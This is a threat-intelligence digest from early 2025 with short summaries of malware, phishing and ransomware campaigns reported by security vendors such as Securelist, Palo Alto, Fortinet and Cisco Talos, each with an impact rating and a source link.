Summary:: Researchers at Securelist have uncovered a large-scale malware campaign in which cybercriminals are distributing cryptocurrency miner disguised as a tool to bypass internet restriction through deep packet inspection (DPI). This malware campaign has infected more than 2,000 users in Russia. The attack began when a youtuber posted a tutorial video for bypassing restrictions. These videos contained links to a malicious archive hosted on the website gitrok[.]com. Before removing the malicious link from description, stating that the program no longer worked, the site had already recorded over 40,000 downloads.

Source: https://securelist.com/silentcryptominer-spreads-through-blackmail-on-youtube/115788/

Intel Source:: Cyble

Intel Name:: Phantom_Goblin_Malware

Date of Scan:: 2025-03-14

Impact:: LOW

Summary:: Cyble researchers have uncovered a new malware strain called Phantom Goblin which is being distributed through RAR attachments in phishing emails. The attackers use social engineering tactic to trick users into opening malicious LNK file disguise a legitimate PDF document. The LNK file is hidden inside the RAR archive that appears as normal document file. When user clicks on the LNK file, it executes a PowerShell command that downloads additional malware from a GitHub repository which allow attackers to carry out malicious activities. This primary target of this malware is to steal sensitive data from victim’s system. It forcefully terminates browser processes to extract cookies, login credentials, browsing history and exfiltrate stolen data through a Telegram bot.

Source: https://cyble.com/blog/phantom-goblin-covert-credential-theft/

Intel Source:: Cyfirma

Intel Name:: Boramae_Ransomware

Date of Scan:: 2025-03-13

Impact:: MEDIUM

Summary:: Cyfirma researchers have identified a new ransomware strain called Boramae which specifically target Window systems and adds the .boramae to encrypted files. The ransomware encrypts user files and leave a ransom note README.txt which provides the instructions for victims to recover their files and changes the desktop wallpaper to pressure victims into paying in 20 minutes. They threaten to leak sensitive data such as financial records and employee data if ransom is not paid. They offer a 50% discount If ransom is paid within 12 hours but warn that attempting to decrypt files without their help could permanently corrupt them.

Source: https://www.cyfirma.com/research/boramae-ransomware/

Intel Source:: Fortinet

Intel Name:: Winos_40_Target_Users_in_Taiwan

Date of Scan:: 2025-03-13

Impact:: LOW

Summary:: Fortinet researchers have identified a campaign targeting organizations in Taiwan leveraging advance malware framework called Winos4.0. Initially it was distributed through gaming apps and now attackers are using phishing email to spread it. The email masquerades as a message from Taiwan’s National Taxation Bureau that claim to contain a list of enterprise schedule for tax inspection and asking the recipient to forward the information to their company’s treasurer. However, the attachment is actually a ZIP file containing malicious files including ApowerREC.exe. When the fake ApowerREC.exe. runs, it secretly activates the malware which allow the attacker to take control of the machine and steal data.

Source: https://www.fortinet.com/blog/threat-research/winos-spreads-via-impersonation-of-official-email-to-target-users-in-taiwan

Intel Source:: Silent Push

Intel Name:: Lazarus_Group_Relies_on_Astrill_VPN

Date of Scan:: 2025-03-13

Impact:: MEDIUM

Summary:: Silent Push researchers have confirmed that North Korea’s Lazarus Group, including its subgroup Contagious Interview (Famous Chollima), continues to use Astrill VPN to hide their IP addresses during cyber operations. Recent infrastructure and logs obtained from Contagious Interview show ongoing VPN usage during testing processes. Additionally, DPRK Fake IT workers, previously reported by Google’s Mandiant in September 2024, also rely on Astrill VPN to evade detection by employers. Multiple research partners have independently verified these findings, reinforcing the long-standing pattern of Lazarus Group utilizing Astrill VPN for obfuscation.

Source: https://www.silentpush.com/blog/astrill-vpn/?utm_source=rss&utm_medium=rss&utm_campaign=astrill-vpn

Intel Source:: Securelist

Intel Name:: A_Deep_Dive_into_Angry_Likho

Date of Scan:: 2025-03-12

Impact:: MEDIUM

Summary:: Researchers from Securelist have uncovered a new threat actor called Angry Likho also known as Sticky Werewolf targeting organisation in Russia and Belarus since 2023. This group operates with a smooth infrastructure and primarily targets employees of major corporations, government agencies and contractors. Angry Likho primarily leverage spear-phishing tactics to distribute malware which contains an archive file that includes two malicious shortcut (LNK) files along with a legitimate-looking bait document. Once document is opened, the malware is activated and deploy Lumma Stealer which is capable of stealing sensitive information including stored banking credentials from web browsers and cryptocurrency wallet files.

Source: https://securelist.com/angry-likho-apt-attacks-with-lumma-stealer/115663/

Intel Source:: Palo Alto

Intel Name:: CL_STA_0049_Targeting_Multiple_Entities

Date of Scan:: 2025-03-12

Impact:: MEDIUM

Summary:: Palo Alto researchers have discovered a new threat actor dubbed CL-STA-0049 suspected to be linked to China. This group emerged in March 2023 and has been targeting government agencies, defense organizations, telecommunications companies, educational institutions and aviation sectors in Southeast Asia and South America. The primary objective of this group is to steal sensitive information from the organisations including details of high-ranking officials. They leverage an advanced malware called Squidoor aka FinalDraft. It works on both Window and Linux systems and provide attackers remote access to compromised systems.

Source: https://unit42.paloaltonetworks.com/advanced-backdoor-squidoor/

Intel Source:: TheRavenFile

Intel Name:: Lazarus_Group_Open_Source_Trap

Date of Scan:: 2025-03-12

Impact:: MEDIUM

Summary:: The Marstech Campaign, attributed to the DPRK Lazarus group, utilizes Stark Industry's Bulletproof Hosting Service to host malware and facilitate direct communication. The campaign prominently uses older malware, such as Strela Stealer, BeaverTail, and other JavaScript-based malware, which were previously employed in 2023. Despite the passage of time, Lazarus has not significantly updated its tools or methods, continuing to rely on tactics like job recruitment phishing and NPM package infections. Two hostnames, DESKTOP-GKGI28A and DESKTOP-2NFCDE2, were identified during the campaign's investigation.

Source: https://github.com/TheRavenFile/Daily-Hunt/blob/main/Lazarus/Marstech.txt

Intel Source:: Palo Alto

Intel Name:: Stately_Taurus_Now_Linked_to_Bookworm_Malware

Date of Scan:: 2025-03-12

Impact:: LOW

Summary:: Unit 42 researchers have discovered that Stately Taurus, a threat group targeting ASEAN-affiliated organizations, overlaps with infrastructure used by the Bookworm malware. Stately Taurus had previously used DLL sideloading to deliver the PubLoad malware, which Unit 42 now believes is unique to this group. Before this discovery, Bookworm had not been linked to any specific actor, but after nearly a decade, researchers confidently associate Stately Taurus with its use.

Source: https://unit42.paloaltonetworks.com/stately-taurus-uses-bookworm-malware/

Intel Source:: McAfee

Intel Name:: The_Dark_Side_of_Clickbait

Date of Scan:: 2025-03-11

Impact:: LOW

Summary:: McAfee researchers have identified a phishing campaign where attackers are leveraging fake viral videos links to trick people into downloading malware. The scam begins with a PDF file that appears to contain a link to a viral video. When the file is opened, it displays a big blue clickable text “Watch ➤ Click Here To Link (Full Viral Video Link)” along with fake video player image. If user clicked on the link, it redirects users to malicious webpages which shows leaked videos, excessive ads and fake notification to entice users. It promotes adult content, gambling and misleading download buttons that could lead to malware traps.

Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-dark-side-of-clickbait-how-fake-video-links-deliver-malware

Intel Source:: Cofense

Intel Name:: Hook_Line_and_Tax_Sink

Date of Scan:: 2025-03-11

Impact:: LOW

Summary:: Researchers from Cofense have discovered a phishing campaign targeting employees by taking advantage of their Tax return during tax season to steal Microsoft login credentials. In this campaign, cybercriminals send emails that appear from Strategic Tax Planning but many employees only notice the subject line Tax enrollment and the message inside to complete the task by clicking the View and Manage Tasks button rather than checking sender’s email which is not relatable. Once clicked, the link takes the employee to a fake Mimecast URL protection page where they asked to enter their work email and click to verify then redirected to CAPTCHA test. After completing the CAPTCHA, they are redirected to a fake Microsoft login page. If the employee enters their email and password here, the attackers will steal their login credentials and compromise their account.

Source: https://cofense.com/blog/hook-line-tax-sink

Intel Source:: Cado Security Labs

Intel Name:: Chinese_APT_Target_Royal_Thai_Police

Date of Scan:: 2025-03-11

Impact:: LOW

Summary:: Cado researchers have discovered a malware campaign in which Chinese state sponsored threat called Mustang Panda targeting the Royal Thai Police. The attackers leverage phishing email to send a RAR archive named “Very Urgent, please join the cooperation project to train the FBI course.rar.” which contains a Word document along with a fake PDF and a folder named $Recycle.bin. When the file is executed, it runs FTP script inside the fake pdf to download and execute Yokai backdoor that allow the attackers to gain control over the victim’s system.

Source: https://www.cadosecurity.com/blog/chinese-apt-target-royal-thai-police-in-malware-campaign

Intel Source:: Trend Micro

Intel Name:: Shadowpad_Malware_Deploys_Ransomware

Date of Scan:: 2025-03-11

Impact:: MEDIUM

Summary:: Researchers from Trend Micro have discovered the use of Shadowpad malware in the deployment of a previously unknown ransomware family. In two recent incident response incidents in Europe, attackers used weak passwords and overcame multi-factor authentication to gain network access. Over the last seven months, at least 21 companies from 15 countries in Europe, the Middle East, Asia, and South America have been targeted using identical strategies. The attackers primarily targeted the manufacturing sector, with Shadowpad implemented on domain controllers following first breach.

Source: https://www.trendmicro.com/en_us/research/25/b/updated-shadowpad-malware-leads-to-ransomware-deployment.html

Intel Source:: Securelist

Intel Name:: The_GitVenom_Campaign

Date of Scan:: 2025-03-10

Impact:: LOW

Summary:: Researchers at Securelist have uncovered a GitVenom campaign in which attackers are targeting Github users by tricking them into downloading malicious code from fake projects. This campaign has been active for two years and primarily targets Russia, Brazil and Turkey. The attackers have created hundreds of deceptive repositories that contain fake software such as automation of Instagram interactions, managing Bitcoin wallets via Telegram or hacking the video game Valorant. These fake projects are written in various programming languages like Python, JavaScript, C, C++ and C#. The main goal is to download more malicious files from a attacker’s controlled GitHub account and run them on the victim's computer.

Source: https://securelist.com/gitvenom-campaign/115694/

Intel Source:: Cisco Talos

Intel Name:: Phishing_Campaign_Targets_Online_Sellers

Date of Scan:: 2025-03-10

Impact:: LOW

Summary:: Researchers at Cisco Talos have uncovered a recent phishing campaign targeting online marketplace sellers. The scammers are using the platforms' direct messaging features to steal sellers' credit card details for their payout accounts. Common scam tactics include altering shipment details, pressuring sellers to conduct off-platform transactions, and attempting to use “friends and family” payment options, which bypass seller protections. These phishing efforts may either compromise the seller’s account, allowing attackers to manipulate listings and shipments, or steal financial information like bank account or credit card details to commit fraud.

Source: https://blog.talosintelligence.com/online-marketplace-scams/

Intel Source:: Sekoia

Intel Name:: PolarEdge_Botnet

Date of Scan:: 2025-03-10

Impact:: LOW

Summary:: Researchers from Sekoia have observed that attackers are exploiting a Vulnerability CVE-2023-20118 in Cisco Small Business routers that allow them to run remote commands on vulnerable devices. In January, the attackers leveraged this flaw to install webshell which allow them to control the router remotely. In February, attackers used a botnet to distribute malicious script. This script installs a backdoor called PolarEdge which is capable of encrypted communication. This botnet has been active since 2023 and infected 2000 device globally. It primarily targets routers and network storage devices like Asus, QNAP, and Synology.

Source: https://blog.sekoia.io/polaredge-unveiling-an-uncovered-iot-botnet/#h-iocs

Intel Source:: ESET

Intel Name:: DeceptiveDevelopment_Campaign

Date of Scan:: 2025-03-10

Impact:: MEDIUM

Summary:: ESET researchers have identified a campaign called DeceptiveDevelopment linked to North Korean threat actor targeting freelance software developers. This campaign has been active since 2023 and target developers involved in cryptocurrency and decentralized finance projects. The attackers pretend to be recruiters and approach developers on Job search and freelancing websites. They ask candidate to complete a code test using project files which contain malware. Once files are opened, the victim’s system is compromise. They use two types of malwares like BeaverTail and InvisibleFerret which allows attackers to steal cryptocurrency wallets, login credentials stored in web browser, password managers and other sensitive information.

Source: https://www.welivesecurity.com/en/eset-research/deceptivedevelopment-targets-freelance-developers/

Intel Source:: Google Cloud

Intel Name:: Russian_Threat_Actors_Target_Signal

Date of Scan:: 2025-03-09

Impact:: MEDIUM

Summary:: Researchers from Google Threat Intelligence Group have found an increase in efforts by several Russia-aligned threat actors to breach Signal Messenger accounts, notably those of individuals of interest to Russia's intelligence agencies. These attacks, which are most likely motivated by wartime intelligence demands, largely use Signal's "linked devices" functionality using phishing techniques that trick users into attaching their accounts to threat actor-controlled devices.

Source: https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger/

Intel Source:: Reliaquest

Intel Name:: Rapid_Phishing_Attack_Targets_Manufacturer

Date of Scan:: 2025-03-09

Impact:: LOW

Summary:: ReliaQuest researchers have recently responded to a manufacturing sector breach involving phishing and data exfiltration, where attackers achieved a rapid breakout time of just 48 minutes. The attackers, linked to the Black Basta ransomware group, used social engineering tactics, including a flood of spam emails from a spoofed domain, and convinced users to open a remote-access tool, Quick Assist. This allowed the attackers to gain control of at least two user machines, progressing their attack quickly.

Source: https://www.reliaquest.com/blog/blink-and-theyre-in-how-rapid-phishing-attacks-exploit-weaknesses/

Intel Source:: ASEC

Intel Name:: ACRStealer_Infostealer

Date of Scan:: 2025-03-09

Impact:: LOW

Summary:: ASEC researchers have observed that the cybercriminals are distributing ACRStealer disguise as illegal software like cracks and keygens. Earlier LummaC2 malware was commonly used but now ACRStealer is distributed more frequently. This malware first appeared in June last year and uses a stealthy technique called Dead Drop Resolver to hide its C2 server inside legitimate websites such as Google docs. It is more flexible as compared to previous infostealers in its their server address and constantly changes its location.

Source: https://asec.ahnlab.com/ko/86365/

Intel Source:: Slovenia

Intel Name:: BeaverTail_and_InvisibleFerret

Date of Scan:: 2025-03-08

Impact:: LOW

Summary:: CERT-Slovenia researchers have highlighted an attack where cybercriminals impersonate job seekers or collaborators to trick victims into running malicious code. They initially contact targets via LinkedIn and send a link to a seemingly harmless demo project. Once launched, the project executes two malicious modules: BeaverTail (written in Node.js) and InvisibleFerret (written in Python). BeaverTail steals data and creates a backdoor, while InvisibleFerret serves a different purpose. Security experts believe these activities are linked to state-sponsored hackers from North Korea.

Source: https://www.cert.si/tz016/

Intel Source:: ISC.SANS

Intel Name:: Analysis_of_XWorm_Malware_Variant

Date of Scan:: 2025-03-08

Impact:: LOW

Summary:: Researchers at SANS have analyzed a sophisticated piece of malware, specifically, a variant of XWorm, which uses advanced obfuscation techniques to evade detection, including PowerShell functions to decode and decompress data. It leverages scheduled tasks and registry modifications for persistence, and communicates with a Telegram API to exfiltrate data. The malware also collects system information, likely for further exploitation, and can execute DDoS attacks. The file names are deliberately misleading (e.g., "XingCode Unblocker 2025.exe") to disguise its true nature.

Source: https://isc.sans.edu/diary/rss/31700

Intel Source:: ReliaQuest

Intel Name:: Black_Basta_Phishing_Attack_Spotted

Date of Scan:: 2025-03-08

Impact:: LOW

Summary:: Researchers from ReliaQuest have discovered a fast-moving phishing attack in the industrial sector, in which attackers entered into the network and expanded within 48 minutes, significantly faster than before. They used techniques associated with the "Black Basta" ransomware group to steal data. This demonstrates that hackers are becoming faster, making timely security solutions more essential than ever.

Source: https://www.reliaquest.com/blog/blink-and-theyre-in-how-rapid-phishing-attacks-exploit-weaknesses/

Intel Source:: SentinelOne

Intel Name:: Ghostwriter_Targets_Ukraine_and_Belarus

Date of Scan:: 2025-03-07

Impact:: MEDIUM

Summary:: SentinelLabs researchers have identified an ongoing cyber campaign targeting opposition activists in Belarus and Ukrainian military and government organizations. The campaign, which began preparations in July-August 2024, became active in November-December 2024. Recent malware samples and command-and-control infrastructure activity suggest that the operation is still active. They believe this campaign is an extension of the long-running Ghostwriter campaign, which has been previously reported.

Source: https://www.sentinelone.com/labs/ghostwriter-new-campaign-targets-ukrainian-government-and-belarusian-opposition/

Intel Source:: EclecticIQ

Intel Name:: Sandworm_APT_Targets_Ukrainian_Users

Date of Scan:: 2025-03-07

Impact:: MEDIUM

Summary:: Researchers from EclecticIQ have uncovered a cyber espionage campaign conducted by Sandworm, a threat group linked to Russia’s military intelligence agency targeting Ukrainian Window users. This campaign started in late 2023 where attackers are leveraging a malware infected version of a Microsoft Key Management Service activation tool. The attackers disguise this tool as a legitimate Window activator and upload it on torrent websites to trick users into downloading and running it. Once executes, a Backorder malware silently install itself in the background then Backorder downloads and executes Dark Crystal RAT that allows attackers to steal sensitive data, spy on the infected system and potentially take control of it.

Source: https://blog.eclecticiq.com/sandworm-apt-targets-ukrainian-users-with-trojanized-microsoft-kms-activation-tools-in-cyber-espionage-campaigns

Intel Source:: CloudSEK

Intel Name:: Lumma_Stealer_Malware_Hits_Multiple_Sectors

Date of Scan:: 2025-03-07

Impact:: MEDIUM

Summary:: CloudSEK researchers have observed the Lumma Stealer malware campaign that is exploiting compromised educational institutions to distribute malicious LNK files disguised as PDFs. These files target sectors such as finance, healthcare, technology, and media. Upon execution, they trigger a covert, multi-stage infection process, enabling cybercriminals to steal sensitive information like passwords, browser data, and cryptocurrency wallets. The malware employs advanced evasion methods, including utilizing Steam profiles for command-and-control functions.

Source: https://www.cloudsek.com/blog/lumma-stealer-chronicles-pdf-themed-campaign-using-compromised-educational-institutions-infrastructure

Intel Source:: Socket

Intel Name:: Typosquatted_Go_Packages_Target_Linux_and_MacOS

Date of Scan:: 2025-03-06

Impact:: LOW

Summary:: Researchers from Socker have discovered a malicious campaign targeting developers using the Go programming language by uploading of fake versions of Go library. These fake versions are typosquatted packages that closely mimic legitimate ones but secretly install malware that targets Linux and MacOS systems. The attackers have created seven packages including four that impersonate the legitimate HTTP API testing tool called Hypert. These malicious versions contain hidden function (qcJjJne()) that secretly downloads and runs malicious scripts from suspicious websites like alturastreet[.]icu, host3ar[.]com, and binghost7[.]com.

Source: https://socket.dev/blog/typosquatted-go-packages-deliver-malware-loader

Intel Source:: Bridewell

Intel Name:: Diving_Deep_into_Hellcat_Ransomware

Date of Scan:: 2025-03-06

Impact:: LOW

Summary:: Hellcat is a new and aggressive Ransomware-as-a-Service (RaaS) group, first identified in late 2024, known for high-profile cyberattacks across multiple industries, including telecommunications, government, and IT. Their tactics include phishing, exploiting public-facing applications, and deploying advanced PowerShell infection chains to establish persistence and control via SliverC2 malware. Hellcat also uses custom ransomware payloads, Living-off-the-Land (LotL) techniques, and unique exfiltration methods leveraging SFTP and cloud services.

Source: https://www.bridewell.com/insights/blogs/detail/who-are-hellcat-ransomware-group

Intel Source:: Resecurity

Intel Name:: DragonForce_Ransomware

Date of Scan:: 2025-03-05

Impact:: MEDIUM

Summary:: Resecurity researchers have uncovered a ransomware group called DragonForce targeting real estate and construction companies in Riyadh, Saudi Arabia. This group has exfiltrated 6TB of sensitive data and threatens to release it if ransom is not paid just before Ramadan. DragonForce first appeared in 2023 and operates as a Ransomware-as-a-service (RaaS) group. The group is aggressively expanding its network and advertise its services on the RAMP underground forum to attract affiliates with promises of high payouts, strong technical support and even call services to pressure victims. The group has also developed advanced ransomware payload builders on the dark web that allow affiliates to customize their attacks significantly.

Source: https://www.resecurity.com/blog/article/dragonforce-ransomware-group-is-targeting-saudi-arabia

Intel Source:: Palo Alto

Intel Name:: Multiple_Malware_Using_Encryption_and_Virtualization

Date of Scan:: 2025-03-05

Impact:: LOW

Summary:: Palo Alto researchers have observed malware developers using multiple tricks to hide malicious code from security tools and sandboxes. Most of the malware such as Agent Tesla, Xworm and FormBook/Xloader use obfuscation techniques to avoid detection. These malwares employ various methods which include code virtualization where malware instructions are converted into a custom language. One common method is hiding the malware payload inside extra data at the end of a file known as the PE overlay. Dynamic code loading and .NET reflection allow malware to modify or add new code while running. Additionally, AES encryption is used to encrypt important critical malware components.

Source: https://unit42.paloaltonetworks.com/malware-obfuscation-techniques/

Intel Source:: Fortinet

Intel Name:: Havoc_Demon_Agent

Date of Scan:: 2025-03-04

Impact:: MEDIUM

Summary:: Researchers from FortiGuard have uncovered a phishing campaign that leverages a ClickFix technique along with multi-stage malware to deliver an advanced version of Havoc Demon. It is a C2 framework which is used for gaining full control over compromised system through cybercriminals. This customized version of Havoc Demon communicates via the Microsoft Graph API to disguise its malicious traffic. The attack starts with phishing email that contains HTML attachment which urges the recipient to open it. Once user open the file, it shows fake error message and deceives the user into copying and executing a malicious PowerShell command. This command downloads and runs a remote PowerShell script, ultimately deploying the advanced Havoc Demon Agent.

Source: https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2

Intel Source:: Proofpoint

Intel Name:: Highly_Targeted_Polyglot_Malware_Attack

Date of Scan:: 2025-03-04

Impact:: MEDIUM

Summary:: Proofpoint researchers have uncovered a highly targeted email-based cyber campaign against a few entities in the UAE, specifically those interested in aviation, satellite communications, and critical transportation infrastructure. The attackers used compromised, trusted business relationships to deliver customized phishing lures. This campaign led to the discovery of a new backdoor malware, dubbed Sosano, which employs advanced obfuscation techniques, including polyglot files, to evade detection. The adversary behind this attack demonstrates significant development capabilities and a strong intent to protect their payloads. Proofpoint tracks this threat cluster as UNK_CraftyCamel.

Source: https://www.proofpoint.com/us/blog/threat-insight/call-it-what-you-want-threat-actor-delivers-highly-targeted-multistage-polyglot

Intel Source:: Splunk

Intel Name:: Infostealer_Campaign_against_ISPs

Date of Scan:: 2025-03-04

Impact:: LOW

Summary:: Researchers at Splunk have identified a cyber campaign targeting ISP infrastructure providers in the U.S. (West Coast) and China. Originating from Eastern Europe, the attack leverages weak credentials for initial access, followed by data exfiltration via C2 servers, deployment of additional crimeware, self-termination for evasion, and persistence measures. Attackers primarily use scripting languages like Python and PowerShell to operate stealthily and utilize Telegram for C2 communication. The main objective appears to be cryptomining (XMR), with attackers pivoting through compromised CIDRs while minimizing detection.

Source: https://www.splunk.com/en_us/blog/security/infostealer-campaign-against-isps.html

Intel Source:: G-Data

Intel Name:: Lumma_Stealer_Targeting_Booking_Websites

Date of Scan:: 2025-03-04

Impact:: MEDIUM

Summary:: GDATA researchers have identified a campaign in which booking websites are being exploited to distribute Lumma Stealer. This malware first appeared in 2023 and operates as Malware-as-a-Service. The attackers are deceiving users with fake CAPTCHA prompts on booking websites. When users verify the CAPTCHA, it secretly downloads malware onto their system. They are targeting users looking to book trips to Palawan, Philippines and hotels in Munich, Germany. Initially, the malware was spread through platforms like telegrams and github but now attackers are using malicious ads to target more victims.

Source: https://www.gdatasoftware.com/blog/2025/03/38154-lummastealer-fake-recaptcha

Intel Source:: Trend Micro

Intel Name:: Black_Basta_and_Cactus_Use_BackConnect

Date of Scan:: 2025-03-03

Impact:: MEDIUM

Summary:: Attackers leverage social engineering, Microsoft Teams, and remote access tools, such as Quick Assist, to gain unauthorized access. They exploited OneDriveStandaloneUpdater.exe for DLL side-loading and deployed BackConnect malware, linked to QakBot, for persistent control. Black Basta and Cactus ransomware operators use this malware after the compromise. Additionally, attackers abuse WinSCP and commercial cloud storage services for data exfiltration. Trend Micro researchers have reported 39 breaches since October 2024, with the US being the most affected.

Source: https://www.trendmicro.com/en_us/research/25/b/black-basta-cactus-ransomware-backconnect.html

Intel Source:: Esentire

Intel Name:: Sneaky2FA_Phishing_Kit_Bypasses_2FA

Date of Scan:: 2025-03-03

Impact:: LOW

Summary:: Researchers at Esentire have observed that the one user accessed a phishing site linked to Sneaky2FA which is a Phishing-as-a-Service kit designed to bypass two-factor authentication (2FA) and steal session cookies. The attack starts with a spam email that contain OneDrive link to a deceive pdf. When user open the pdf and click on the embedded link, they are redirected to a fraudulent Office 365 login page controlled by Sneaky2FA. Additionally, they use stolen session cookies through VPNs to maintain access to compromised accounts. Once access is gained, attackers often modify or create new MFA to ensure long-term control over the account.

Source: https://www.esentire.com/blog/your-mfa-is-no-match-for-sneaky2fa

Intel Source:: Securelist

Intel Name:: Hunting_the_Web_Shell

Date of Scan:: 2025-03-02

Impact:: LOW

Summary:: Securelist SOC team responded to an alert triggered by Kaspersky Endpoint Security, detecting a web shell on a government SharePoint server. The attackers used certutil to download a malicious ASPX payload from a service called Bashupload, obfuscating the command to evade detection. The payload was disguised as a 404 error page, allowing the attacker to maintain persistence. The investigation revealed the web shell was part of a modular exploitation framework commonly used by Chinese-speaking threat actors.

Source: https://securelist.com/soc-files-web-shell-chase/115714/

Intel Source:: Cisco Talos

Intel Name:: Lotus_Blossom_Targets_Industries_with_Sagerunex

Date of Scan:: 2025-03-02

Impact:: MEDIUM

Summary:: Researchers from Cisco Talos have discovered multiple cyber espionage campaigns targeting government, manufacturing, telecommunications, and media sectors, attributed to the Lotus Blossom threat group. Active since at least 2012, Lotus Blossom uses the Sagerunex backdoor for post-compromise activities, including gaining persistence by configuring the backdoor to run as a service on infected systems. The group has also developed new Sagerunex variants that utilize both traditional command-and-control servers and legitimate third-party cloud services like Dropbox, Twitter, and Zimbra for communication.

Source: https://blog.talosintelligence.com/lotus-blossom-espionage-group/

Intel Source:: Palo Alto

Intel Name:: North_Korean_Hackers_Target_macOS_Users

Date of Scan:: 2025-03-01

Impact:: LOW

Summary:: Palo Alto researchers have uncovered a Rust-based macOS malware, named RustDoor, which disguises itself as a legitimate software update. They also identified a previously unknown macOS variant of the Koi Stealer malware family. During their investigation, they observed advanced evasion techniques, manipulating macOS components to avoid detection. These tactics align with recent reports of North Korean threat actors targeting job seekers. Based on these findings, there is a moderate level of confidence that the attack was carried out on behalf of the North Korean regime.

Source: https://unit42.paloaltonetworks.com/macos-malware-targets-crypto-sector/

Intel Source:: SOLAR

Intel Name:: Erudite_Mogwai_Leverages_Custom_Stowaway

Date of Scan:: 2025-03-01

Impact:: LOW

Summary:: A cyber-attack is detected during daily monitoring at the Solar JSOC countermeasure center, with mass activations of Impacket AtExec. The investigation traced the attack to an unmonitored network segment, where Stowaway and ShadowPad Light samples were found. The attack, originating from publicly accessible web services, began as early as March 2023. In November 2024, attackers attempted to expand their reach but were detected. The attackers modified Stowaway, creating a custom version with obfuscation techniques, including LZ4 compression, XXTEA encryption, and added support for the QUIC protocol to proxy traffic.

Source: https://rt-solar.ru/solar-4rays/blog/5261/

Intel Source:: ISC.SANS

Intel Name:: Njrat_Campaign_Using_Microsoft_Dev_Tunnels

Date of Scan:: 2025-02-28

Impact:: MEDIUM

Summary:: Recent malware samples have been discovered using Microsoft’s dev tunnels service to connect to their C2 servers, exploiting the service meant for secure remote access by developers. These samples, which share the same ImpHash, use different dev tunnel URLs to send status updates and potentially propagate through USB devices. To detect this activity, monitoring DNS logs for requests to devtunnels.ms is recommended. Additionally, scanning for unusual registry entries and network traffic can help identify infected systems, especially considering the malware's persistence mechanisms.

Source: https://isc.sans.edu/diary/Njrat+Campaign+Using+Microsoft+Dev+Tunnels/31724/

Intel Source:: Silent Push

Intel Name:: Lazarus_Group_Linked_to_Bybit_Heist

Date of Scan:: 2025-02-28

Impact:: MEDIUM

Summary:: Researchers at Silent Push have uncovered sensitive infrastructure used by the Lazarus APT Group, linking them to the $1.4 billion Bybit crypto heist. They identified a newly registered domain tied to a previously used email address and found "Lazaro" mentioned in logs, indicating a connection to Lazarus. The team also discovered 27 unique Astrill VPN IP addresses associated with the group, confirming their preference for this VPN. Additionally, Lazarus continues using fake LinkedIn job interviews to distribute malware. The Lazarus Group, linked to North Korea's Reconnaissance General Bureau, has been active since 2009 and is known for large-scale cyber operations.

Source: https://www.silentpush.com/blog/lazarus-bybit/?utm_source=rss&utm_medium=rss&utm_campaign=lazarus-bybit

Intel Source:: Seqrite

Intel Name:: Fake_CAPTCHA_Delivers_Lumma_Stealer

Date of Scan:: 2025-02-28

Impact:: LOW

Summary:: Seqrite researchers have discovered a new malware campaign delivering Lumma Stealer, an infostealer operating under the malware-as-a-service model. The attackers continue using the ClickFix tactic, which involves phishing and fake reCAPTCHA pages, but have now shifted to impersonating Cloudflare verification pages. Victims are tricked into running malicious commands via clipboard manipulation. The campaign uses MSHTA and PowerShell to deliver a .NET loader, further advancing the infection chain.

Source: https://www.seqrite.com/blog/fake-captcha-lures-victims-lumma-stealer-abuses-clipboard-and-powershell/

Intel Source:: Zscaler

Intel Name:: DeepSeek_Using_CAPTCHAs_To_Spread_Malware

Date of Scan:: 2025-02-27

Impact:: LOW

Summary:: Zscaler researchers have identified a campaign in which attackers are leveraging brand impersonation of DeepSeek by creating fake websites that appear legitimate. When user visit a fake DeepSeek website, they are asked to complete CAPTCHA verification process that seems legitimate but actually hides a malicious script which secretly copies a malicious PowerShell command onto the user’s clipboard. If the user unknowingly pastes and executes this command, it downloads and runs a malware called Vidar Stealer which is capable to collect sensitive data, including login credentials, banking information and cryptocurrency wallets. The attackers use Telegram and Steam for their C2 communications to hide their malicious activities.

Source: https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware

Intel Source:: Forescout Research

Intel Name:: Silver_Fox_APT_Targets_Healthcare_with_Malware

Date of Scan:: 2025-02-27

Impact:: HIGH

Summary:: Forescout researchers have uncovered a campaign by the China-based APT group Silver Fox, which exploited Philips DICOM viewers to deploy malware on victim systems. The malicious software, masquerading as legitimate viewers, included ValleyRAT, a backdoor remote access tool, along with a keylogger and crypto miner. Healthcare, already a major target for cyberattacks in 2023 and 2024, saw these threats as part of a broader trend, with Silver Fox using these exploits to gain control over medical applications and systems, potentially disrupting patient care and compromising sensitive data.

Source: https://www.forescout.com/blog/healthcare-malware-hunt-part-1-silver-fox-apt-targets-philips-dicom-viewers/

Intel Source:: Palo Alto

Intel Name:: Auto_Color_A_Linux_Malware

Date of Scan:: 2025-02-26

Impact:: MEDIUM

Summary:: Researchers at Palo Alto have discovered a Linux based malware called Auto-Color that provides full remote access to compromised machine. It primarily targets universities and government offices in North America and Asia. It disguises itself with different names like door or egg and rename itself to Auto-Color once installed. If the user has an admin access, the malware installs a fake system library that mimics a legitimate Linux Library to avoid detection. The malware also modifies a system file to ensure its malicious code runs before any other functions.

Source: https://unit42.paloaltonetworks.com/new-linux-backdoor-auto-color/

Intel Source:: Cisco Talos

Intel Name:: Salt_Typhoon_Targets_US_Telecoms

Date of Scan:: 2025-02-26

Impact:: MEDIUM

Summary:: Cisco Talos researchers have monitored a sophisticated intrusion campaign by Salt Typhoon, a threat actor targeting U.S. telecommunications companies. The campaign, which began in late 2024, primarily involves gaining access to Cisco network devices using legitimate login credentials. While only one instance of a Cisco vulnerability (CVE-2018-0171) is identified, no new vulnerabilities are discovered. The threat actor employs living-off-the-land (LOTL) techniques to persist in environments for extended periods, sometimes for over three years.

Source: https://blog.talosintelligence.com/salt-typhoon-analysis/

Intel Source:: Group IB

Intel Name:: A_Growing_Threat_of_Browser_Fingerprinting

Date of Scan:: 2025-02-26

Impact:: LOW

Summary:: Browser fingerprinting is a growing threat used by cybercriminals to collect unique identifiers from users without their consent, allowing fraudsters to bypass security measures and impersonate victims. A recent campaign identified by Group-IB involved the malicious injection of a fingerprinting script into compromised Magento websites, affecting over 115 e-commerce sites. This script silently collects data like browser settings, plugins, and system properties from desktop users. The implications for both individuals and businesses are significant, leading to account lockouts and fraud.

Source: https://www.group-ib.com/blog/fingerprint-heists/

Intel Source:: CheckPoint

Intel Name:: Check_Point_CVE_2024_24919_Exploit_Attack

Date of Scan:: 2025-02-25

Impact:: LOW

